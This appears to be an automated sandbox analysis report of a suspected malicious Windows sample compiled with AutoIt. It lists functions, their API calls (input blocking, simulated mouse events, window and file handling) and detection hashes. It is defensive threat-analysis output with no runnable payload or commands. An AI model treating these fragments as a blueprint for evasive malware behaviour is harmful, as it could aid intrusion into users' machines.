                                • Opcode Fuzzy Hash: 80c8999e59561988f77df6b16ba1c8d09a1ff80cc4fcacfef2ef7eb803307ab6
                                • Instruction Fuzzy Hash: 29B1E320D2AF414DD7239639883133ABA5CAFBB2D5F92D71BFD1674D62EB2185838181
                                Function 00CB703C Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                Download Yara Rule
                                APIs
                                • BlockInput.USER32(00000001), ref: 00CB7057
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: BlockInput
                                • String ID:
                                • API String ID: 3456056419-0
                                • Opcode ID: 69c75d3317696e984c19b9e539e23f1c5734f1843609442e2f87f21d74e02d6d
                                • Instruction ID: a1e6a789273aa6ce06db067f7fc63b65191e1128a72db3d750bd40865ae99a10
                                • Opcode Fuzzy Hash: 69c75d3317696e984c19b9e539e23f1c5734f1843609442e2f87f21d74e02d6d
                                • Instruction Fuzzy Hash: A7E012752042045FC710EB69D844A9AB7DC9F94750F008427F945D7251DAB0EC009B90
                                Function 00CA7DD5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                Download Yara Rule
                                APIs
                                • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00CA7DF8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: mouse_event
                                • String ID:
                                • API String ID: 2434400541-0
                                • Opcode ID: aba76d750a8a05abedc82cd2ad32406d41192cd8564cec0d196eb4a59ee641f7
                                • Instruction ID: aa14e555cae03d33a61929185ea026f8afc3e67ffb76dcd4d83b2afa07beaa46
                                • Opcode Fuzzy Hash: aba76d750a8a05abedc82cd2ad32406d41192cd8564cec0d196eb4a59ee641f7
                                • Instruction Fuzzy Hash: ECD09EA596C60779FD1947209C2FF7B1118FB43789FA45749B112CA0C1EC906D446535
                                Function 00CDC146 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: NameUser
                                • String ID:
                                • API String ID: 2645101109-0
                                • Opcode ID: da865907da96b5017f55fc58f4b03318f102161e11727c3784e078d378e39939
                                • Instruction ID: c5a90d9a392d3b8f9f6b650800cf68ae6cbc02e1b8896a7c6212fa8816311555
                                • Opcode Fuzzy Hash: da865907da96b5017f55fc58f4b03318f102161e11727c3784e078d378e39939
                                • Instruction Fuzzy Hash: 28C048B280401EEFCB55CB80C989AEFB7BCBB08300F244096A21AE2100D7719F45AB76
                                Function 00C88E19 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                Download Yara Rule
                                APIs
                                • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00C88E1F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled
                                • String ID:
                                • API String ID: 3192549508-0
                                • Opcode ID: 45983efc71e59e8631501fdae001c6f7e8fc310134a5f944b1d0882f50ab0597
                                • Instruction ID: 1494c7a0e7e3b81c05bd2bf96eb7e8e3cd87d10b08c672b1c9bf557cc22df876
                                • Opcode Fuzzy Hash: 45983efc71e59e8631501fdae001c6f7e8fc310134a5f944b1d0882f50ab0597
                                • Instruction Fuzzy Hash: E4A0243000070CF7CF001F51FC0454D7F7CD7041507004010F40D04031C733541045C1
                                Function 00C8A937 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00C86AE9,00D167D8,00000014), ref: 00C8A937
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: HeapProcess
                                • String ID:
                                • API String ID: 54951025-0
                                • Opcode ID: 5a4420465260aba7cf4af36368b9588d6e88b5ed07f94a8b2d333afc6851df1e
                                • Instruction ID: 3d93a7e1586b3fd021516f6284fe6b9729d54da83ce121e28afcedcfb312df92
                                • Opcode Fuzzy Hash: 5a4420465260aba7cf4af36368b9588d6e88b5ed07f94a8b2d333afc6851df1e
                                • Instruction Fuzzy Hash: 1BB012B03032024BD7084B38AC9431E3DD8574A111305403D7003C6661DB308450DF00
                                Function 00C80EC4 Relevance: .3, Instructions: 345COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                • Instruction ID: 2bae19af2deaa5ee9f481217c7cf44eab8d90ff350f61e4422d1df646256d83a
                                • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                • Instruction Fuzzy Hash: 6BC1F5722051A349DF6D563AC43447EFAE16EA27B932E076DD8B3CB4C0EE24C629D714
                                Function 00C812F9 Relevance: .3, Instructions: 341COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                • Instruction ID: b382bda8da7030a3d19ef952e66d98d2a15e0f565a91414b2c9ef823b61ddf6b
                                • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                • Instruction Fuzzy Hash: C4C129722051A349DF6D563AC43047EBAE55AA27B931E076DD8B3CB4C0FE24C72AD724
                                Function 00C80A8F Relevance: .3, Instructions: 331COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                • Instruction ID: fb080c6c51b6fc13340b0aac62df30e6ccfa960dc9c9c0e6df1a5dc56e89082b
                                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                • Instruction Fuzzy Hash: 3AC1D5723051A34ADFAD563AC43447EFBA16AA27B972A076DD4B3CB0C0EE14D62CD714
                                Function 00C80677 Relevance: .3, Instructions: 323COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                • Instruction ID: e14823f54ab1edbf3a994e428fcb1bc9b57760f94c3c6bcd095d09321292daf6
                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                • Instruction Fuzzy Hash: 83C128722051A349DFAD563AC43447EBBA06EA27B972A036DD4B3CB0C1EE24C62CD714
                                Function 03393600 Relevance: .1, Instructions: 92COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366580328.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_3390000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                • Instruction ID: 18fb68bc5dbe9dace9f2c3592db70cf3f8396ff235ad14dd57967d27b830bdd9
                                • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                • Instruction Fuzzy Hash: 8F41C2B1D1051CEBDF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB40
                                Function 03393490 Relevance: .0, Instructions: 35COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366580328.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_3390000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                • Instruction ID: 9ed411cb6629e4ccbe95fc06bfefe4419b687419d6075bc5b4d2fafd68a56de8
                                • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                • Instruction Fuzzy Hash: D8019278A01209EFDB45DF98C5909AEF7B5FB48310F2485DAD819A7701D730EE41DB80
                                Function 033934F0 Relevance: .0, Instructions: 35COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366580328.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_3390000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                • Instruction ID: d0ddb849ec203721570ccd78b2ae506cf879a8179ee1faddf99ff927b70fb099
                                • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                • Instruction Fuzzy Hash: E60192B8A00209EFDB49DF98C5909AEF7B5FB4C320F24859AD809A7701D730AE41DB80
                                Function 03391E70 Relevance: .0, Instructions: 6COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366580328.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_3390000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                Function 00CBA750 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                Download Yara Rule
                                APIs
                                • DeleteObject.GDI32(00000000), ref: 00CBA7A5
                                • DeleteObject.GDI32(00000000), ref: 00CBA7B7
                                • DestroyWindow.USER32 ref: 00CBA7C5
                                • GetDesktopWindow.USER32 ref: 00CBA7DF
                                • GetWindowRect.USER32(00000000), ref: 00CBA7E6
                                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00CBA927
                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00CBA937
                                • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CBA97F
                                • GetClientRect.USER32(00000000,?), ref: 00CBA98B
                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00CBA9C5
                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CBA9E7
                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CBA9FA
                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CBAA05
                                • GlobalLock.KERNEL32(00000000), ref: 00CBAA0E
                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CBAA1D
                                • GlobalUnlock.KERNEL32(00000000), ref: 00CBAA26
                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CBAA2D
                                • GlobalFree.KERNEL32(00000000), ref: 00CBAA38
                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CBAA4A
                                • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00CED9BC,00000000), ref: 00CBAA60
                                • GlobalFree.KERNEL32(00000000), ref: 00CBAA70
                                • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00CBAA96
                                • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00CBAAB5
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CBAAD7
                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CBACC4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                • String ID: $AutoIt v3$DISPLAY$static
                                • API String ID: 2211948467-2373415609
                                • Opcode ID: 0d042a501a0d49509a198c1fc2472958503a2afdf14bdffe6848dac4ece5f6fe
                                • Instruction ID: a58721445416e1b57a08f870ddf9c4d7371eee91ae2df9fb325adb4ac545acb4
                                • Opcode Fuzzy Hash: 0d042a501a0d49509a198c1fc2472958503a2afdf14bdffe6848dac4ece5f6fe
                                • Instruction Fuzzy Hash: 04028D75900259EFDB14DFA8CD89FAE7BB9FB48310F008159F956AB2A0DB319D41CB60
                                Function 00CCD095 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                Download Yara Rule
                                APIs
                                • SetTextColor.GDI32(?,00000000), ref: 00CCD0EB
                                • GetSysColorBrush.USER32(0000000F), ref: 00CCD11C
                                • GetSysColor.USER32(0000000F), ref: 00CCD128
                                • SetBkColor.GDI32(?,000000FF), ref: 00CCD142
                                • SelectObject.GDI32(?,00000000), ref: 00CCD151
                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00CCD17C
                                • GetSysColor.USER32(00000010), ref: 00CCD184
                                • CreateSolidBrush.GDI32(00000000), ref: 00CCD18B
                                • FrameRect.USER32(?,?,00000000), ref: 00CCD19A
                                • DeleteObject.GDI32(00000000), ref: 00CCD1A1
                                • InflateRect.USER32(?,000000FE,000000FE), ref: 00CCD1EC
                                • FillRect.USER32(?,?,00000000), ref: 00CCD21E
                                • GetWindowLongW.USER32(?,000000F0), ref: 00CCD249
                                  • Part of subcall function 00CCD385: GetSysColor.USER32(00000012), ref: 00CCD3BE
                                  • Part of subcall function 00CCD385: SetTextColor.GDI32(?,?), ref: 00CCD3C2
                                  • Part of subcall function 00CCD385: GetSysColorBrush.USER32(0000000F), ref: 00CCD3D8
                                  • Part of subcall function 00CCD385: GetSysColor.USER32(0000000F), ref: 00CCD3E3
                                  • Part of subcall function 00CCD385: GetSysColor.USER32(00000011), ref: 00CCD400
                                  • Part of subcall function 00CCD385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CCD40E
                                  • Part of subcall function 00CCD385: SelectObject.GDI32(?,00000000), ref: 00CCD41F
                                  • Part of subcall function 00CCD385: SetBkColor.GDI32(?,00000000), ref: 00CCD428
                                  • Part of subcall function 00CCD385: SelectObject.GDI32(?,?), ref: 00CCD435
                                  • Part of subcall function 00CCD385: InflateRect.USER32(?,000000FF,000000FF), ref: 00CCD454
                                  • Part of subcall function 00CCD385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CCD46B
                                  • Part of subcall function 00CCD385: GetWindowLongW.USER32(00000000,000000F0), ref: 00CCD480
                                  • Part of subcall function 00CCD385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CCD4A8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                • String ID:
                                • API String ID: 3521893082-0
                                • Opcode ID: 26f1d2643aca11e905c942a80e5874054c719322b4e4a8be8910cf7eebcd4c93
                                • Instruction ID: a052b28bd092dab4f2f0171aa27125601a725f2f9daa58b67da489bf0ae612b9
                                • Opcode Fuzzy Hash: 26f1d2643aca11e905c942a80e5874054c719322b4e4a8be8910cf7eebcd4c93
                                • Instruction Fuzzy Hash: 8C917DB2409341AFDB109F64DC88F6FBBA9FB85325F100A29F9639A1E0D771D944CB52
                                Function 00C648C8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON
                                Download Yara Rule
                                APIs
                                • DestroyWindow.USER32 ref: 00C64956
                                • DeleteObject.GDI32(00000000), ref: 00C64998
                                • DeleteObject.GDI32(00000000), ref: 00C649A3
                                • DestroyIcon.USER32(00000000), ref: 00C649AE
                                • DestroyWindow.USER32(00000000), ref: 00C649B9
                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 00CDE179
                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00CDE1B2
                                • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00CDE5E0
                                  • Part of subcall function 00C649CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C64954,00000000), ref: 00C64A23
                                • SendMessageW.USER32 ref: 00CDE627
                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00CDE63E
                                • ImageList_Destroy.COMCTL32(00000000), ref: 00CDE654
                                • ImageList_Destroy.COMCTL32(00000000), ref: 00CDE65F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                • String ID: 0
                                • API String ID: 464785882-4108050209
                                • Opcode ID: 6288e487a7e2eed547123fb379c949a791ea704573c969f96d4b4c1009e4f646
                                • Instruction ID: 441e2fda6923f2b75abcedc8243db98984910a75528197b2ef7784e369007931
                                • Opcode Fuzzy Hash: 6288e487a7e2eed547123fb379c949a791ea704573c969f96d4b4c1009e4f646
                                • Instruction Fuzzy Hash: F7128D30600241DFDB28EF14C8C4BAABBE5BF05304F54456AF6AACF262C731E956DB91
                                Function 00CBA3F7 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                Download Yara Rule
                                APIs
                                • DestroyWindow.USER32(00000000), ref: 00CBA42A
                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00CBA4E9
                                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00CBA527
                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00CBA539
                                • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00CBA57F
                                • GetClientRect.USER32(00000000,?), ref: 00CBA58B
                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00CBA5CF
                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00CBA5DE
                                • GetStockObject.GDI32(00000011), ref: 00CBA5EE
                                • SelectObject.GDI32(00000000,00000000), ref: 00CBA5F2
                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00CBA602
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CBA60B
                                • DeleteDC.GDI32(00000000), ref: 00CBA614
                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00CBA642
                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 00CBA659
                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00CBA694
                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00CBA6A8
                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 00CBA6B9
                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00CBA6E9
                                • GetStockObject.GDI32(00000011), ref: 00CBA6F4
                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00CBA6FF
